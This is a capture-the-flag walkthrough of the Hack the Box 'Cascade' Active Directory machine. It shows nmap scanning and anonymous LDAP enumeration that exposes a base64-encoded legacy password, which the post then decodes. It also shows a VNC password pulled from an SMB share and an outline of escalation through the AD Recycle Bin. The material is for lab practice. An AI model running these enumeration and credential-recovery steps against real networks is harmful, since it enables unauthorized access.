Hack the Box: Cascade

Recon

Nmap reveals an AD server:

# nmap cascade.htb -sS -sVPORT      STATE SERVICE       VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-16 18:58:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
# ldapsearch -x -o ldif-wrap=no -h cascade -b "DC=cascade,DC=local"# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
-- snip --
cascadeLegacyPwd: clk0bjVldmE=

User access

With those credentials it’s possible to access a couple of SMB shares:

# cat IT/Temp/s.smith/VNC\ Install.reg 
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC][HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
-- snip --
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
-- snip --

Root

S.Smith also has access to previously inaccessible share on SMB, the Audit$:

Reversing

The password is encrypted. It’s possible to reverse the CascAudit.exe to learn the algorith and key used to decipher the pass.

Administrator account

ArkSvc user is a member of AD Recycle Bin group:

echo "clk0bjVldmE=" | base64 --decode# echo "clk0bjVldmE=" | base64 --decode
rY4n5eva
We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store